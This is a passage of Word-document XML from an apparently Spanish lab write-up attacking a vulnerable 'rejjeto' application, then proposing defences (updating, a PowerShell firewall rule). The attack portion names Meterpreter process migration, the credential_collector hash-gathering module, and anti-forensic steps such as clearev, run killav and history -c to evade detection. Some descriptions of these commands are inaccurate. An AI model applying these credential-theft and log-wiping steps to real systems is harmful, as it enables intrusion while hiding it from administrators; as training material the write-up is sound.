                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1433195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53781CC9" w14:textId="77777777" w:rsidR="000D799C" w:rsidRDefault="000D799C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D2E115" w14:textId="75B350A8" w:rsidR="00717129" w:rsidRDefault="00717129" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que voy hacer es migrar la sesión</w:t>
      </w:r>
      <w:r w:rsidR="007A5F52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D799C">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a un proceso, para esto ejecutaré una Shell para poder ver los procesos de la máquina con tasklist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A07B0" w14:textId="77777777" w:rsidR="00717129" w:rsidRDefault="00717129" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27999EE5" w14:textId="69C04347" w:rsidR="00717129" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Escribo ps para ver los procesos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C66414" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C922916" w14:textId="2D3B00A3" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B943538" wp14:editId="5B794B2A">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1705689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9431" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203"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0E94D89" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA07EAB" w14:textId="5AA8D6A2" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y migraré al proceso 420:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E2557" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13470181" w14:textId="5A0C02D6" w:rsidR="009B7456" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19D5AB81" wp14:editId="7F2051F0">
            <wp:extent cx="5400040" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="868973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3142" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="868680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AC7F8" w14:textId="77777777" w:rsidR="00C51882" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F00C35" w14:textId="15D4F72D" w:rsidR="00C51882" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora con el comando de meterpreter clearev eliminare las variables guardadas en la máquina atacada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79425D86" w14:textId="77777777" w:rsidR="00C51882" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B29BA3" w14:textId="06EB8EE1" w:rsidR="00C51882" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00C51882">
        <w:t>En resumen, el comando clearev es útil para eliminar información sensible o confidencial que pueda estar almacenada en la memoria de la máquina objetivo en la sesión actual de Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A33534" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D3904F" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5674A201" w14:textId="369684F3" w:rsidR="009B7456" w:rsidRDefault="00C51882" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="477724B6" wp14:editId="74128E57">
            <wp:extent cx="5400040" cy="908050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="61072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28564" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="908050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E9BAD9" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29875B5B" w14:textId="77777777" w:rsidR="009B7456" w:rsidRDefault="009B7456" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F53AD3D" w14:textId="775560A1" w:rsidR="00717129" w:rsidRDefault="00717129" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62868564" w14:textId="04DB9820" w:rsidR="00C815D2" w:rsidRDefault="00C815D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora probaremos con este post de metasploit ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C815D2">
        <w:t>post(windows/gather/credentials/credential_collector)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="009069BC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0D4B8" w14:textId="77777777" w:rsidR="00C815D2" w:rsidRDefault="00C815D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B29D95C" w14:textId="0D6D8C7E" w:rsidR="00C815D2" w:rsidRDefault="00C815D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D69CEB" w14:textId="77777777" w:rsidR="00F90E8B" w:rsidRDefault="00F90E8B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF6E431" w14:textId="2592C06B" w:rsidR="00F90E8B" w:rsidRDefault="00F90E8B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Configuramos la sesión y lo ejecutamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FDA1E6" w14:textId="77777777" w:rsidR="00F90E8B" w:rsidRDefault="00F90E8B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40080DBA" w14:textId="12F3EE0A" w:rsidR="00F90E8B" w:rsidRDefault="009069BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Obteniendo todos los hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174EEE98" w14:textId="77777777" w:rsidR="009069BC" w:rsidRDefault="009069BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E1024F" w14:textId="1B20A796" w:rsidR="009069BC" w:rsidRDefault="009069BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC9EFE5" wp14:editId="1B5893F5">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1416135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35146" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"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DB629FF" w14:textId="77777777" w:rsidR="007E55BA" w:rsidRDefault="007E55BA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FFB9FF" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Cuando se trabaja con una sesión de Meterpreter, es importante tomar medidas para borrar los rastros de la sesión una vez que se ha completado el trabajo o la exploración de la máquina objetivo. Esto se debe a que los rastros de la sesión pueden ser detectados por los administradores del sistema o por herramientas de seguridad y utilizados para identificar la fuente de la intrusión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F3A9D" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>A continuación se presentan algunos de los pasos que puedes seguir para limpiar los rastros de una sesión de Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC85DBE" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Usa el comando clearev para borrar las variables de entorno que se hayan establecido en la sesión actual de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C13185" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Utiliza el comando history -c para borrar el historial de comandos que se haya almacenado en la sesión actual de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E957996" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Usa el comando run killav para detener y desactivar temporalmente cualquier programa antivirus o de seguridad que se haya detectado en la máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176620CD" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:lastRenderedPageBreak/>
        <w:t>Utiliza el comando run persistence -d para eliminar cualquier persistencia o backdoor que se haya establecido en la máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44050505" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Si se han cargado módulos o se han utilizado scripts personalizados durante la sesión, asegúrate de borrar los archivos de configuración y los archivos binarios que se hayan generado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E56EA" w14:textId="77777777" w:rsidR="009628A4" w:rsidRPr="007E55BA" w:rsidRDefault="009628A4" w:rsidP="007E55BA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="007E55BA">
        <w:t>Finalmente, utiliza el comando exit para cerrar la sesión de Meterpreter y eliminar todos los rastros de la sesión en la memoria de la máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B7498" w14:textId="77777777" w:rsidR="00F90E8B" w:rsidRDefault="00F90E8B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2CED16" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="00AE6362">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc135575991"/>
      <w:r>
        <w:t>Defensa -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="05F78470" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3E1577" w14:textId="65DB7583" w:rsidR="009628A4" w:rsidRDefault="00500FD3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para la defensa de esta POC, lo principal que tendremos que tener en cuenta que el problema se produce por usar una aplicación que tiene una vulnerabilidad, la cual en versiones posteriores no existe, por lo tanto lo principal que habría que hacer es conseguir una nueva versión de rejjeto o buscar otra manera de tener la funcionalidad que nos brinda esta aplicación de otra manera, es decir con el uso de otra aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BD47F" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C644AB5" w14:textId="68C52222" w:rsidR="00AE6362" w:rsidRDefault="00D62CF9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para actualizar rejjeto, lo que tendremos que hacer es abrir la aplicación y pulsar en Update now:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FCAC2" w14:textId="77777777" w:rsidR="00D62CF9" w:rsidRDefault="00D62CF9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40153C9D" w14:textId="4D7CBA81" w:rsidR="00D62CF9" w:rsidRDefault="00D62CF9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="450BBFE1" wp14:editId="6ECCEC7C">
            <wp:extent cx="6095238" cy="4000000"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="1429812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2843" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6095238" cy="4000000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532797A" w14:textId="16AD55A5" w:rsidR="00AE6362" w:rsidRDefault="003B28F2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">También podríamos crear una regla del Firewall de Windows para que solo ciertos equipos se pudieran conectar a </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>él</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> así mitigar que desde cualquier máquina se le pudiera atacar, para eso propondré un comando de PowerShell que crearía una regla del firewall de Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020B6D94" w14:textId="77777777" w:rsidR="003B28F2" w:rsidRDefault="003B28F2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C460C0" w14:textId="77777777" w:rsidR="003B28F2" w:rsidRDefault="003B28F2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116D0544" w14:textId="51933EA2" w:rsidR="00AE6362" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18D6AA5D" wp14:editId="7E527FA2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1868064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4EEF68C5" w14:textId="66AA0A45" w:rsidR="006A17E1" w:rsidRDefault="006A17E1">
                            <w:r w:rsidRPr="006A17E1">
                              <w:t>New-NetFirewallRule -DisplayName "Bloquear puerto 80 excepto 192.168.1.</w:t>
                            </w:r>
                            <w:r>
                              <w:t>44</w:t>
                            </w:r>
                            <w:r w:rsidRPr="006A17E1">
                              <w:t>" -Direction Inbound -LocalPort 80 -Protocol TCP -RemoteAddress "!192.168.1.</w:t>
                            </w:r>
                            <w:r>
                              <w:t>44</w:t>
                            </w:r>
                            <w:r w:rsidRPr="006A17E1">
                              <w:t>" -Action Block</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02A4F1A9" w14:textId="0A7A5ECD" w:rsidR="006A17E1" w:rsidRDefault="006A17E1">
                            <w:r>
                              <w:t>Esto lo que hará es que solo se puea usar el puerto de rejjeto con la IP 192.168.1.4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D6AA5D" id="_x0000_s1054" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517606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&#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GrQ2ru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4EEF68C5" w14:textId="66AA0A45" w:rsidR="006A17E1" w:rsidRDefault="006A17E1">
                      <w:r w:rsidRPr="006A17E1">
                        <w:t>New-NetFirewallRule -DisplayName "Bloquear puerto 80 excepto 192.168.1.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>44</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006A17E1">
                        <w:t>" -Direction Inbound -LocalPort 80 -Protocol TCP -RemoteAddress "!192.168.1.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>44</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006A17E1">
                        <w:t>" -Action Block</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02A4F1A9" w14:textId="0A7A5ECD" w:rsidR="006A17E1" w:rsidRDefault="006A17E1">
                      <w:r>
                        <w:t>Esto lo que hará es que solo se puea usar el puerto de rejjeto con la IP 192.168.1.44.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="772980E8" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2186E0BF" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C39C3E" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358222B0" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52235F68" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB56E59" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3B7E12" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4B51DB" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05933AD1" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B161976" w14:textId="37E44339" w:rsidR="00AE6362" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto sería un ejemplo se podrían agregar </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46CB87" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A65D2C" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66889B73" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FDAAFC" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2B8A6A" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EABF497" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7039CE" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2481E36B" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2906B554" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
